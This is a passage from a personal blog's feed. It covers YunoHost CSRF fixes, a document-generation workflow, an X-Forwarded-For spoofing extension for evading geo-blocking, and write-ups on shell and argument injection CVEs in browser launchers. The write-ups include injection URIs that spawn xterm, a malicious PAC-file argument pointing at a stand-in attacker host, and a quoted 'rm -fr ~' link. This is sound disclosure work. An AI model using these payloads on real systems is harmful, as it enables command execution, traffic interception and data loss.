You could very easily build a list of YunoHost instances and try to CSRF them all,\nfor example by baiting their owners with a blog post about YunoHost \"\ud83d\ude09\".

\n

Updates

\n

Changes in YunoHost 3.3

\n

Since YunoHost 3.3, released on 2018-11-23,\nthe SameSite=lax\nparameter is now set on the SSOwat cookies.\nWith this setting, the browser does not send the\ncookie when the request is CSRF-able\n(i.e. when it is an unsafe HTTP method, such as POST, coming from another origin).\nSupport for this cookie parameter is\nnot available in all browsers\nbut it is supposed to work on most evergreen browsers.

\n
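For illustration, a Set-Cookie header like the ones in the trace above would now carry the extra attribute (hypothetical reconstruction):

```
Set-Cookie: SSOwAuthUser=johndoe; Domain=.yunohost.test; Path=/; Secure; SameSite=Lax
```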

This change is effective against the CSRF in VPN Client\nand should fix the CSRF in other InternetCube applications.

\n

However, this change alone does not prevent CSRF on the administration interface:\nthe SameSite=lax setting is only\nset on the SSOwat cookies (SSOwAuthUser, SSOwAuthHash and SSOwAuthExpire)\nand not on the Moulinette cookies (session.id and session.hashes)\nused by the API.

\n

Changes in OpenVPN Client app 1.3.0

\n

The OpenVPN Client app 1.3.0, released on 2018-12-02, includes\na protection against CSRF.\nThese changes are needed to protect browsers without support for SameSite\ncookies. On browsers with SameSite support, this change is not strictly needed.

\n

These changes have currently not been ported to the other vulnerable\nInternetCube apps. This is not a problem as long as the user's browser has\nSameSite cookie support.

\n

Changes in YunoHost 3.4

\n

YunoHost 3.4, released on 2019-01-29, includes a\nbasic anti-CSRF fix in Moulinette.\nCurrently it relies on the client adding an X-Requested-With HTTP header.

\n

References

\n

Issues and pull requests

\n\n

Informative

\n"}, {"id": "http://www.gabriel.urdhr.fr/2018/11/26/document-generation-workflow/", "title": "My document generation workflow with Markdown, YAML, Jinja2 and WeasyPrint", "url": "https://www.gabriel.urdhr.fr/2018/11/26/document-generation-workflow/", "date_published": "2018-11-26T00:00:00+01:00", "date_modified": "2018-11-26T00:00:00+01:00", "tags": ["computer", "python"], "content_html": "

I'm not a super fan of WYSIWYG text editors. They never really do what I want\nthem to and often do what I don't want them to.\nHere's the workflow I'm using to generate simple text documents\n(resumes, cover letters, etc.) from Markdown, YAML and Jinja2 templates.

\n

Summary:

\n
    \n
  1. input document is in Markdown with YAML frontmatter
  2. \n
  3. HTML conversion using a Jinja2 template
  4. \n
  5. PDF conversion from HTML with WeasyPrint
  6. \n
\n

Good-old make coordinates the different steps.

\n

The nice things about this approach are:

\n\n

Input file

\n

The input document is a Markdown file with a YAML frontmatter and looks like this:

\n
---\nname: John Doe\ntitle: Super hero\naddress:\n  - 221B Baker Street\n  - London\n  - UK\nlang: en\nphone: +XX-X-XX-XX-XX-XX\nemail: john.doe@example.com\nwebsite: http://www.example.com/john.doe/\n---\n
\n\n\n
## Introduction\n\nLorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor\nincididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam,\nquis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo\nconsequat. Duis aute irure dolor in reprehenderit in voluptate velit esse\ncillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat\nnon proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\n\n\n## Discussion\n\nLorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod\ntempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam,\nquis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo\nconsequat. Duis aute irure dolor in reprehenderit in voluptate velit esse\ncillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat\nnon proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\n\n\n\n## Conclusion\n\nLorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod\ntempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam,\nquis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo\nconsequat. Duis aute irure dolor in reprehenderit in voluptate velit esse\ncillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat\nnon proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\n
\n\n\n

HTML conversion

\n

I'm using a Jinja2 template to convert the input Markdown document into HTML:

\n
<html xmlns=\"http://www.w3.org/1999/xhtml\" lang=\"{{ lang | escape}}\">\n<head>\n  <meta charset=\"utf-8\"/>\n  <meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"/>\n  <title>{{ title | escape }}</title>\n  <link rel=\"stylesheet\" type=\"text/css\" href=\"style.css\"/>\n</head>\n<body>\n\n<header>\n  <address>\n    <strong>{{ name | escape }}</strong><br/>\n    {% for line in address %}\n    {{ line | escape }}<br/>\n    {% endfor %}\n  </address>\n  <span class=\"details\">\n    <p><span title=\"{{ 'T\u00e9l\u00e9phone' if lang == 'fr' else 'Phone' }}\">\u260e</span>\n      <a href=\"tel:{{ phone | escape}}\">{{ phone | escape }}</a></p>\n    <p><a href=\"mailto:{{ email | escape }}\">{{ email | escape }}</a></p>\n    <p><a href=\"{{ website | escape }}\">{{ website | escape }}</a></p>\n  </span>\n</header>\n\n<h1>{{ title | escape }}</h1>\n{{ body }}\n\n</body>\n</html>\n
\n\n\n

The conversion is done with a Python script (./render):

\n
#!/usr/bin/env python3\n\nfrom sys import argv\nimport re\n\nimport yaml\nimport markdown\nfrom markdown.extensions.extra import ExtraExtension\nfrom jinja2 import Environment, FileSystemLoader\nfrom atomicwrites import atomic_write\n\nEXT = [\n    ExtraExtension()\n]\n\nenv = Environment(\n    loader=FileSystemLoader('.'),\n    autoescape=False,\n)\ntemplate = env.get_template('template.j2')\n\nfilename = argv[1]\nout_filename = argv[2]\n\nRE = re.compile(r'^---\\s*$', re.M)\n\n\ndef split_document(data):\n    \"\"\"\n    Split a document into a YAML frontmatter and a body\n    \"\"\"\n    lines = str.splitlines(data)\n    if not RE.match(lines[0]):\n        raise Exception(\"Missing YAML start\")\n    for i in range(1, len(lines)):\n        if RE.match(lines[i]):\n            head_raw = \"\\n\".join(lines[:i+1])\n            head = list(yaml.load_all(head_raw))[0]\n            body = \"\\n\".join(lines[i+2:])\n            return (head, body)\n    raise Exception(\"Missing YAML end\")\n\n\nwith open(filename, \"r\") as f:\n    content = f.read()\n(head, body) = split_document(content)\nbody_html = markdown.markdown(body, extensions=EXT)\nwith atomic_write(out_filename, overwrite=True) as f:\n    f.write(template.render(**head, body=body_html))\n
\n\n\n

Called as:

\n
./render doc.md doc.html\n
\n\n\n

PDF conversion

\n

I'm using WeasyPrint to generate PDF from HTML:

\n
weasyprint doc.html doc.pdf\n
\n\n\n

WeasyPrint has some support for page CSS:

\n
@page {\n  size: A4;\n  margin: 1cm;\n  margin-top: 2cm;\n  margin-bottom: 2cm;\n}\n\n@media print {\n  body {\n    margin-top: 0;\n    margin-bottom: 0;\n  }\n}\n\nh1, h2, h3 {\n  page-break-after: avoid;\n  page-break-inside: avoid;\n}\n\nli {\n  page-break-inside: avoid;\n}\n
\n\n\n

It has support for links, PDF bookmarks, attachments, fonts, etc.

\n

Make

\n

Currently I'm using a Makefile to compose the different steps:

\n
.PHONY: all clear\n\nall: doc.pdf\nclear:\n    rm -f doc.html doc.pdf\n\ndoc.html: doc.md template.j2 render\n    ./render doc.md doc.html\n\ndoc.pdf: doc.html\n    weasyprint doc.html doc.pdf\n
"}, {"id": "http://www.gabriel.urdhr.fr/2018/11/22/south-park-ip-address-spoofing/", "title": "IP address spoofing in order to watch South Park", "url": "https://www.gabriel.urdhr.fr/2018/11/22/south-park-ip-address-spoofing/", "date_published": "2018-11-22T00:00:00+01:00", "date_modified": "2018-11-22T00:00:00+01:00", "tags": ["computer", "web", "hack", "firefox"], "content_html": "

Trying to bring back some old IP spoofing Firefox extension\nfor watching South Park episodes.

\n

Years ago, I was trying to watch the South Park episodes on the\nofficial website. While all the episodes were\nseemingly available for free on the website, they were sadly not available\nfrom a French IP address.\nSo I wrote a Firefox extension which would \u201cspoof\u201d a random US IP address.\nThe extension was sending an X-Forwarded-For HTTP header with a US IP address\non all requests for www.southparkstudios.com and media.mtvnservices.com.\nAt that time these servers were happily trusting the IP address in the HTTP\nheader and would grant you access to the episodes \"\ud83d\ude01\".

\n
// Fake US IP address\n// taken from https://developer.mozilla.org/en/Setting_HTTP_request_headers\n\nfunction rand(min, max) {\n  var range = max - min;\n  return Math.floor((range+1)*Math.random()) + min;\n}\n\nvar ipSpoofer = {\n  ip: \"199.\"+rand(236,240)+\".\"+rand(0,255)+\".\"+rand(1,254),\n  started: false,\n  checkSpoofability : function(httpChannel) {\n    var host = httpChannel.originalURI.host;\n    return host == \"www.southparkstudios.com\" || host == \"media.mtvnservices.com\";\n  },\n  observe: function(subject, topic, data) {\n    if (topic == \"http-on-modify-request\") {\n      var httpChannel = subject.QueryInterface(Components.interfaces.nsIHttpChannel);\n      if (this.checkSpoofability(httpChannel)) {\n        httpChannel.setRequestHeader(\"X-Forwarded-For\", this.ip, false);\n      }\n    }\n  },\n  chooseIp : function() {\n      this.ip = \"199.\"+rand(236,240)+\".\"+rand(0,255)+\".\"+rand(1,254);\n  },\n  start: function() {\n    if (!this.started){\n      if (!this.ip) {\n          this.chooseIp();\n      }\n      Components.classes[\"@mozilla.org/observer-service;1\"].\n        getService(Components.interfaces.nsIObserverService).\n        addObserver(this, \"http-on-modify-request\", false);\n      this.started = true;\n    }\n  },\n  stop: function() {\n    if (this.started)  {\n      Components.classes[\"@mozilla.org/observer-service;1\"].\n        getService(Components.interfaces.nsIObserverService).\n        removeObserver(this, \"http-on-modify-request\");\n      this.started = false;\n    }\n  }\n};\n\nfunction startup(data,reason) {\n  ipSpoofer.start();\n}\n\nfunction shutdown(data,reason) {\n  ipSpoofer.stop();\n}\n
\n\n\n

Old-style Firefox extensions do not work anymore on newer versions of Firefox\nwith the new extension system. I rewrote it in order to check whether that old\ntrick still works these days. And the sad (but expected) truth is that the\nservers no longer blindly trust those HTTP headers \"\ud83d\ude2d\".

\n
function rand(min, max) {\n  const range = max - min;\n  return Math.floor((range+1)*Math.random()) + min;\n}\n\nconst ip = \"199.\" + rand(236,240) + \".\" + rand(0,255) + \".\"+rand(1,254);\n\nfunction rewriteHeaders(req) {\n  const url = new URL(req.url)\n  const headers = Array.from(req.requestHeaders)\n  headers.push({\n    \"name\": \"X-Forwarded-For\",\n    \"value\": ip\n  });\n  headers.push({\n    \"name\": \"Forwarded\",\n    \"value\": \"by=127.0.0.1; for=\" + ip + \"; host=\" + url.host+ \"; proto=\" + (url.protocol.replace(\":\", \"\")),\n  });\n  return {requestHeaders: headers};\n}\n\nbrowser.webRequest.onBeforeSendHeaders.addListener(\n  rewriteHeaders,\n  {urls: [\"<all_urls>\"]},\n  [\"blocking\", \"requestHeaders\"]\n);\n
"}, {"id": "http://www.gabriel.urdhr.fr/2018/05/30/more-browser-injections/", "title": "More example of argument and shell command injections in browser invocation", "url": "https://www.gabriel.urdhr.fr/2018/05/30/more-browser-injections/", "date_published": "2018-05-30T00:00:00+02:00", "date_modified": "2018-05-30T00:00:00+02:00", "tags": ["computer", "unix", "debian", "security", "shell"], "content_html": "

In the previous episode, I talked about\nsome argument and shell command injection vulnerabilities\nthrough URIs passed to browsers.\nHere I'm checking some other CVEs which were registered at the same time.

\n

ScummVM (CVE-2017-17528)

\n

In ScummVM, we have:

\n
bool OSystem_POSIX::openUrl(const Common::String &url) {\n    // inspired by Qt's \"qdesktopservices_x11.cpp\"\n\n    // try \"standards\"\n    if (launchBrowser(\"xdg-open\", url))\n        return true;\n    if (launchBrowser(getenv(\"DEFAULT_BROWSER\"), url))\n        return true;\n    if (launchBrowser(getenv(\"BROWSER\"), url))\n        return true;\n\n    // try desktop environment specific tools\n    if (launchBrowser(\"gnome-open\", url)) // gnome\n        return true;\n    if (launchBrowser(\"kfmclient openURL\", url)) // kde\n        return true;\n    if (launchBrowser(\"exo-open\", url)) // xfce\n        return true;\n\n    // try browser names\n    if (launchBrowser(\"firefox\", url))\n        return true;\n    if (launchBrowser(\"mozilla\", url))\n        return true;\n    if (launchBrowser(\"netscape\", url))\n        return true;\n    if (launchBrowser(\"opera\", url))\n        return true;\n    if (launchBrowser(\"chromium-browser\", url))\n        return true;\n    if (launchBrowser(\"google-chrome\", url))\n        return true;\n\n    warning(\"openUrl() (POSIX) failed to open URL\");\n    return false;\n}\n\nbool OSystem_POSIX::launchBrowser(const Common::String& client, const Common::String &url) {\n    // FIXME: system's input must be heavily escaped\n    // well, when url's specified by user\n    // it's OK now (urls are hardcoded somewhere in GUI)\n    Common::String cmd = client + \" \" + url;\n    return (system(cmd.c_str()) != -1);\n}\n
\n\n\n

OSystem_POSIX::openUrl() calls system() without quoting the URI.\nThis is clearly vulnerable to shell command injection but,\nas stated in the comment, it's currently not a problem in practice\nbecause the only calls to openUrl() are:

\n
g_system->openUrl(\"http://www.amazon.de/EuroVideo-Bildprogramm-GmbH-Full-Pipe/dp/B003TO51YE/ref=sr_1_1?ie=UTF8&s=videogames&qid=1279207213&sr=8-1\");\ng_system->openUrl(\"http://pipestudio.ru/fullpipe/\");\ng_system->openUrl(\"http://scummvm.org/\")\ng_system->openUrl(getUrl())\n
\n\n\n

with:

\n
Common::String StorageWizardDialog::getUrl() const {\n    Common::String url = \"https://www.scummvm.org/c/\";\n    switch (_storageId) {\n    case Cloud::kStorageDropboxId:\n        url += \"db\";\n        break;\n    case Cloud::kStorageOneDriveId:\n        url += \"od\";\n        break;\n    case Cloud::kStorageGoogleDriveId:\n        url += \"gd\";\n        break;\n    case Cloud::kStorageBoxId:\n        url += \"bx\";\n        break;\n    }\n\n    if (Cloud::CloudManager::couldUseLocalServer())\n        url += \"s\";\n\n    return url;\n}\n
\n\n\n

The only case where shell commands are actually injected is the first one,\nwhere it executes something like:

\n
xdg-open https://www.amazon.de/EuroVideo-Bildprogramm-GmbH-Full-Pipe/dp/B003TO51YE/ref=sr_1_1?ie=UTF8&s=videogames&qid=1279207213&sr=8-1\n
\n\n\n

which makes the shell run these harmless variable assignments in background subshells:

\n
ie=UTF8\ns=videogames\nqid=1279207213\nsr=8-1\n
\n\n\n

References:

\n\n

GNU GLOBAL (CVE-2017-17531)

\n

In GNU GLOBAL, it looked like this:

\n
snprintf(com, sizeof(com), \"%s \\\"%s\\\"\", browser, url);\nsystem(com);\n
\n\n\n

Here, the URI is double-quoted but this is not enough:

\n\n
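A quick way to see why double quotes are insufficient: $(...) command substitution is still performed inside them. A sketch of the attack, driven from Python for convenience (true stands in for the browser and a marker file detects the injection; the URL is made up):

```python
import os
import subprocess
import tempfile

marker = os.path.join(tempfile.mkdtemp(), "injected")
browser = "true"  # stand-in browser that ignores its argument
# $(...) command substitution still runs inside double quotes:
url = "http://www.example.com/$(touch %s)" % marker
cmd = '%s "%s"' % (browser, url)  # same shape as the snprintf() above
subprocess.run(cmd, shell=True, check=True)
print(os.path.exists(marker))  # True: the injected command ran
```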

For v6.6.1,\neach argument is quoted with quote_shell() in order to properly escape\nthe shell metacharacters:

\n
strbuf_puts(sb, quote_shell(browser));\nstrbuf_putc(sb, ' ');\nstrbuf_puts(sb, quote_shell(url));\nsystem(strbuf_value(sb));\n
\n\n\n

In v6.6.2\nthis was changed to using execvp():

\n
argv[0] = (char *)browser;\nargv[1] = (char *)url;\nargv[2] = NULL;\nexecvp(browser, argv);\n
\n\n\n

Using execvp() is much better than relying on system() and using\nan error-prone escaping of the URI to prevent injections.

\n
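The same point can be illustrated from Python (echo standing in for the browser): when the program receives an argument vector instead of a command string, shell metacharacters in the URI are inert:

```python
import subprocess

url = "http://www.example.com/$(xterm)&foo"
# No shell is involved: the URI is passed as a single argv entry,
# so $(...) and & are plain characters.
out = subprocess.run(["echo", url], capture_output=True, text=True).stdout.strip()
print(out == url)  # True
```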

References:

\n\n

gjots2 (CVE-2017-17535)

\n

In gjots2, the vulnerable code is:

\n
def _run_browser_on(self, url):\n  if self.debug:\n    print inspect.getframeinfo(inspect.currentframe())[2]\n  browser = self._get_browser()\n  if browser:\n    os.system(browser + \" '\" + url + \"' &\")\n  else:\n    self.msg(\"Can't run a browser\")\n  return 0\n
\n\n\n

The URI is single-quoted.

\n

We can use single-quotes in the URI to inject commands.\nFor example, opening this link in gjots2 spawns an xterm:

\n
\nhttp://www.example.com/'&xterm'\n
\n\n
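For comparison, proper escaping (e.g. shlex.quote() in Python) turns the embedded single quotes back into data. A sketch using echo as a stand-in browser:

```python
import shlex
import subprocess

url = "http://www.example.com/'&xterm'"
# shlex.quote() escapes the embedded quotes and the &,
# so the shell treats the whole URI as one literal word.
cmd = "echo " + shlex.quote(url)
out = subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout.strip()
print(out == url)  # True: nothing was spawned, the URI survived intact
```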

References:

\n\n

AbiWord (CVE-2017-17529)

\n

In AbiWord, we have:

\n
GError *err = NULL;\n#if GTK_CHECK_VERSION(2,14,0)\nif(!gtk_show_uri (NULL, url, GDK_CURRENT_TIME, &err)) {\n  fallback_open_uri(url, &err);\n}\nreturn err;\n#elif defined(WITH_GNOMEVFS)\ngnome_vfs_url_show (url);\nreturn err;\n#else\nfallback_open_uri(url, &err);\nreturn err;\n#endif\n
\n\n\n

The problematic code is supposed to be in fallback_open_uri():

\n
gint    argc;\ngchar **argv = NULL;\nchar   *cmd_line = g_strconcat (browser, \" %1\", NULL);\n\nif (g_shell_parse_argv (cmd_line, &argc, &argv, err)) {\n  /* check for '%1' in an argument and substitute the url\n   * otherwise append it */\n  gint i;\n  char *tmp;\n\n  for (i = 1 ; i < argc ; i++)\n    if (NULL != (tmp = strstr (argv[i], \"%1\"))) {\n      *tmp = '\\0';\n      tmp = g_strconcat (argv[i],\n        (clean_url != NULL) ? (char const *)clean_url : url,\n        tmp+2, NULL);\n      g_free (argv[i]);\n      argv[i] = tmp;\n      break;\n    }\n\n  /* there was actually a %1, drop the one we added */\n  if (i != argc-1) {\n    g_free (argv[argc-1]);\n    argv[argc-1] = NULL;\n  }\n  g_spawn_async (NULL, argv, NULL, G_SPAWN_SEARCH_PATH,\n    NULL, NULL, NULL, err);\n  g_strfreev (argv);\n}\ng_free (cmd_line);\n
\n\n\n

This code seems correct with respect to injection through the URI:\nthe URI string cannot be expanded into multiple arguments\n(no word splitting) and is not passed to system().

\n

I think this code is safe:\nI could not trigger any injection through AbiWord,\nand I tested gtk_show_uri(), fallback_open_uri() and gnome_vfs_url_show()\nin isolation without being able to trigger any injection through the URI either.

\n

References:

\n\n

FontForge (CVE-2017-17521)

\n

In FontForge, the help() function is clearly vulnerable: the URI is\nonly double-quoted:

\n
temp = malloc(strlen(browser) + strlen(fullspec) + 20);\nsprintf( temp, strcmp(browser,\"kfmclient openURL\")==0 ? \"%s \\\"%s\\\" &\" : \"\\\"%s\\\" \\\"%s\\\" &\", browser, fullspec );\nsystem(temp);\n
\n\n\n

In practice, it is always called with paths for which this is safe.

\n

References:

\n\n

Ocaml Batteries Included (CVE-2017-17519)

\n

The code is:

\n
let (browser: (_, _, _) format) = \"@BROWSER_COMMAND@ %s\";;\n\n(**The default function to open a www browser.*)\nlet default_browse s =\n  let command = Printf.sprintf browser s in\n  Sys.command command\nlet current_browse = ref default_browse\n\nlet browse s = !current_browse s\n
\n\n\n

Sys.command (the OCaml equivalent of system()) is called without any quoting of the URI.

\n

Example:

\n
open Batteries;;\nopen BatteriesConfig;;\nbrowse \"http://www.example.com/&xterm\";;\n
\n\n\n

Compiled with:

\n
ocamlfind ocamlc -package batteries -linkpkg browser2.ml -o browser2\n
\n\n\n

References:

\n\n

Python 3 (CVE-2017-17522)

\n

The code is:

\n
class GenericBrowser(BaseBrowser):\n    \"\"\"Class for all browsers started with a command\n       and without remote functionality.\"\"\"\n\n    def __init__(self, name):\n        if isinstance(name, str):\n            self.name = name\n            self.args = [\"%s\"]\n        else:\n            # name should be a list with arguments\n            self.name = name[0]\n            self.args = name[1:]\n        self.basename = os.path.basename(self.name)\n\n    def open(self, url, new=0, autoraise=True):\n        cmdline = [self.name] + [arg.replace(\"%s\", url)\n                                 for arg in self.args]\n        try:\n            if sys.platform[:3] == 'win':\n                p = subprocess.Popen(cmdline)\n            else:\n                p = subprocess.Popen(cmdline, close_fds=True)\n            return not p.wait()\n        except OSError:\n            return False\n
\n\n\n

A note in the CVE says:

\n
\n

NOTE: a software maintainer indicates that exploitation is impossible\nbecause the code relies on subprocess.Popen and the default shell=False\nsetting.

\n
\n

Popen is indeed passed an array of arguments which are passed to execve().\nThere is no argument splitting and no shell is involved\nso this code is not vulnerable to URI-based injections.

\n
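This can be checked with a stand-in command (echo instead of a real browser): even a URL containing spaces reaches the program as a single argument:

```python
import subprocess

url = "http://www.example.com/ --incognito"
# Same construction as GenericBrowser.open() above, with echo
# standing in for the browser name.
cmdline = ["echo"] + [arg.replace("%s", url) for arg in ["%s"]]
out = subprocess.run(cmdline, capture_output=True, text=True).stdout.strip()
print(out == url)  # True: no word splitting happened
```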

References:

\n\n

TeX (CVE-2017-17513)

\n

I have no idea what mtxrun is supposed to do but it looks\nlike it's vulnerable because the URI is not quoted:

\n
local launchers={\n  windows=\"start %s\",\n  macosx=\"open %s\",\n  unix=\"$BROWSER %s &> /dev/null &\",\n}\nfunction os.launch(str)\n  execute(format(launchers[os.name] or launchers.unix,str))\nend\n
\n\n\n

References:

\n\n

Summary

\n"}, {"id": "http://www.gabriel.urdhr.fr/2018/05/28/browser-injections/", "title": "Argument and shell command injections in browser invocation", "url": "https://www.gabriel.urdhr.fr/2018/05/28/browser-injections/", "date_published": "2018-05-28T00:00:00+02:00", "date_modified": "2018-05-28T00:00:00+02:00", "tags": ["computer", "unix", "debian", "security", "shell"], "content_html": "

While reading the source of sensible-browser in order to understand how\nit was choosing which browser to call (and how I could tweak this choice),\nI found an argument injection vulnerability\nwhen handling the BROWSER environment variable.\nThis led me (and others) to a few other argument and shell command injection\nvulnerabilities in BROWSER processing and browser invocation in general.

\n

Overview:

\n\n

The BROWSER environment variable

\n

The BROWSER environment variable is used as a way to specify the user's\npreferred browser. The specific handling of this variable is not consistent\nacross programs:

\n\n

As was already noted in 2001,\nnaively implementing support for this environment variable\n(and especially the %s expansion) can lead to injection vulnerabilities:

\n
\n

Eric Raymond has proposed the BROWSER convention for Unix-like systems,\nwhich lets users specify their browser preferences and lets developers easily\ninvoke those browsers. In general, this is a great idea.\nUnfortunately, as specified it has horrendous security flaws;\ndocuments containing hypertext links like ; /bin/rm -fr ~\nwill erase all of a user's files when the user selects it!

\n
\n

In contrast, the .desktop file specification\nclearly specifies\nhow argument expansion and word splitting is supposed to happen\nwhen processing .desktop files\nin a way which is not vulnerable to injection attacks.

\n

Argument injection in sensible-browser (CVE-2017-17512)

\n

The vulnerability

\n

sensible-browser is a simple program which tries to guess a suitable browser\nto open a given URI. You call it like:

\n
sensible-browser http://www.example.com/\n
\n\n\n

and it ultimately calls something like:

\n
firefox http://www.example.com/\n
\n\n\n

The actual browser called depends on the desktop environment (and its\nconfiguration) and some environment variables.

\n

While trying to understand how I could configure the browser to use,\nI found this snippet:

\n
if test -n \"$BROWSER\"; then\n  OLDIFS=\"$IFS\"\n  IFS=:\n  for i in $BROWSER; do\n      case \"$i\" in\n          (*%s*)\n          :\n          ;;\n          (*)\n          i=\"$i %s\"\n          ;;\n      esac\n      IFS=\"$OLDIFS\"\n      cmd=$(printf \"$i\\n\" \"$URL\")\n      $cmd && exit 0\n  done\nfi\n
\n\n\n

The idea is that when the BROWSER environment variable is set, it is taken\nas a list of browsers which are tried in turn. Moreover, if %s is present in\none of the browser strings, it is replaced with the URI.

\n

The problem is that if $URL contains some spaces (or other IFS characters)\nthe URL will be split into several arguments.

\n

The interesting lines are:

\n
cmd=$(printf \"$i\\n\" \"$URL\")\n$cmd && exit 0\n
\n\n\n
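The word splitting can be reproduced without launching any browser (a sketch, driven from Python for convenience; `echo $#` counts how many arguments the browser would receive after the unquoted `$cmd` expansion):

```python
import subprocess

url = "http://www.example.com/ --incognito"
# Reproduce sensible-browser's unquoted expansion: $cmd is word-split,
# so we count the resulting positional parameters instead of running them.
script = 'cmd=$(printf "%s\\n" "$1"); set -- $cmd; echo $#'
out = subprocess.run(["sh", "-c", script, "sh", url],
                     capture_output=True, text=True).stdout.strip()
print(out)  # 2: the "URL" was split into two separate arguments
```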

An attacker could inject additional arguments in the browser call.

\n

For example, this command opens a Chromium window in incognito mode:

\n
BROWSER=chromium sensible-browser \"http://www.example.com/ --incognito\"\n
\n\n\n

One could argue that this URI is invalid and that this is not a problem.\nHowever, if the caller of sensible-browser does not properly validate the URI,\nan attacker could craft a broken URI which when called\nwill add extra arguments when calling the browser.

\n

A suitable caller

\n

Emacs might call sensible-browser with an invalid URI.

\n

First, we configure it to use open links with sensible-browser:

\n
(setq browse-url-browser-function (quote browse-url-generic))\n(setq browse-url-generic-program \"sensible-browser\")\n
\n\n\n

Now, an org-mode file like this one will open Chromium in incognito mode:

\n
[[http://www.example.com/ --incognito][test]]\n
\n\n\n

Note: I was able to trigger this with org-mode 9.1.2 as shipped in the\nDebian elpa-org package. This does not happen with org-mode 8.2.10\nwhich was shipped in the emacs25 package.

\n

MITMing the browser

\n

This particular example is not very dangerous and the injection is easy\nto notice. However, other injected arguments can be more harmful and more\ninsidious.

\n

Clicking on the link of this org file launches Chromium with an\nalternative PAC file:

\n
[[http://www.example.com/ --proxy-pac-file=http://dangerous.example.com/proxy.pac][test]]\n
\n\n\n

Nothing notifies the user that an alternative PAC file is in use.

\n

An attacker could use this type of URI to forward all the browser traffic\nto a server under their control, effectively MITMing it:

\n
function FindProxyForURL(url, host)\n{\n  return \"SOCKS mitm.example.com:9080\";\n}\n
\n\n\n

Of course, for HTTPS websites, the attacker still cannot MITM the user unless\nthe user accepts a bogus certificate.

\n

Alternatively, you can simply\npass a --proxy-server argument\nto set a proxy without using a PAC file.

\n

Fixing the vulnerability

\n

A possible fix would be for sensible-browser to actually check that the\nURL parameter does not contain any IFS character.

\n
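Such a check could look like this (a sketch only; url_is_single_word is a hypothetical helper, not the actual patch):

```python
def url_is_single_word(url):
    # Reject URLs containing default-IFS characters (space, tab, newline),
    # which are what the unquoted expansion would split on.
    return not any(c in url for c in " \t\n")

print(url_is_single_word("http://www.example.com/"))             # True
print(url_is_single_word("http://www.example.com/ --incognito")) # False
```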

The fix currently deployed is to remove support for %s-expansion altogether\n(as well as support for multiple browsers):

\n
if test -n \"$BROWSER\"; then\n    ${BROWSER} \"$@\"\n    ret=\"$?\"\n    if [ \"$ret\" -ne 126 ] && [ \"$ret\" -ne 127 ]; then\n        exit \"$ret\"\n    fi\nfi\n
\n\n\n

References

\n\n

Argument injection in xdg-open (CVE-2017-18266)

\n

xdg-open is similar to sensible-browser. It opens files or URIs with some\nprograms depending on the desktop environment.\nIn some cases it falls back to using BROWSER:

\n
open_envvar()\n{\n    local oldifs=\"$IFS\"\n    local browser browser_with_arg\n\n    IFS=\":\"\n    for browser in $BROWSER; do\n        IFS=\"$oldifs\"\n\n        if [ -z \"$browser\" ]; then\n            continue\n        fi\n\n        if echo \"$browser\" | grep -q %s; then\n            $(printf \"$browser\" \"$1\")\n        else\n            $browser \"$1\"\n        fi\n\n        if [ $? -eq 0 ]; then\n            exit_success\n        fi\n    done\n}\n
\n\n\n

The interesting bit is:

\n
$(printf \"$browser\" \"$1\")\n
\n\n\n

This is vulnerable to argument injection like the sensible-browser case.

\n

This bug was reported in the xdg-utils bugtracker as bug\n#103807\nand I proposed this very simple fix:

\n
if echo \"$browser\" | grep -q %s; then\n  # Avoid argument injection.\n  # See https://bugs.freedesktop.org/show_bug.cgi?id=103807\n  # Valid URIs don't contain IFS characters (spaces) anyway.\n  has_single_argument $1 && $(printf \"$browser\" \"$1\")\nelse\n  $browser \"$1\"\nfi\n
\n\n\n

where has_single_argument() is defined as:

\n
has_single_argument()\n{\n  test $# = 1\n}\n
\n\n\n

Another (better) solution\ncurrently shipped in Debian is:

\n
url=\"$1\"\nif echo \"$browser\" | grep -q %s; then\n  shift $#\n  for arg in $browser; do\n    set -- \"$@\" \"$(printf -- \"$arg\" \"$url\")\"\n  done\n  \"$@\"\nelse\n  $browser \"$url\"\nfi\n
\n\n\n

By the way, I learned about this usage of set.

\n

References:

\n\n

Shell command injection in lilypond (CVE-2017-17523, CVE-2018-10992)

\n

I started checking if the same vulnerability could be found in other programs\nusing Debian code search.\nThis led me to lilypond-invoke-editor.

\n

This is a helper script expected to be set as a URI handler in a PDF viewer.\nIt handles some special lilypond URIs\n(textedit://FILE:LINE:CHAR:COLUMN).\nIt forwards other URIs to some real browser using:

\n
(define (run-browser uri)\n  (system\n   (if (getenv \"BROWSER\")\n       (format #f \"~a ~a\" (getenv \"BROWSER\") uri)\n       (format #f \"firefox -remote 'OpenURL(~a,new-tab)'\" uri))))\n
\n\n\n

The Scheme system function is equivalent to the C system():\nit passes the argument to the shell (with sh -c).

\n

This case is worse than the previous ones.\nNot only can an attacker inject extra arguments\n(provided the caller can pass IFS characters)\nbut it's possible to inject arbitrary shell commands:

\n
BROWSER=\"chromium\" lilypond-invoke-editor \"http://www.example.com/ & xterm\"\n
\n\n\n

It even works with valid URIs:

\n
BROWSER=\"chromium\" lilypond-invoke-editor \"http://www.example.com/&xterm\"\n
\n\n\n

We can generate a simple PDF file which contains a link\nwhich calls xterm through lilypond-invoke-editor:

\n
BROWSER=\"lilypond-invoke-editor\" mupdf xterm-inject.pdf\n
\n\n\n

The current fix in Debian is:

\n
(define (run-browser uri)\n  (if (getenv \"BROWSER\")\n        (system*\n          (getenv \"BROWSER\")\n          uri)\n          (system*\n            \"firefox\"\n            \"-remote\"\n            (format #f \"OpenUrl(~a,new-tab)\" uri))))\n
\n\n\n

system* is similar to posix_spawnp(): it takes a list of arguments\nand does something like fork(), execvp() and wait()\n(without going through a shell interpreter).

\n

References:
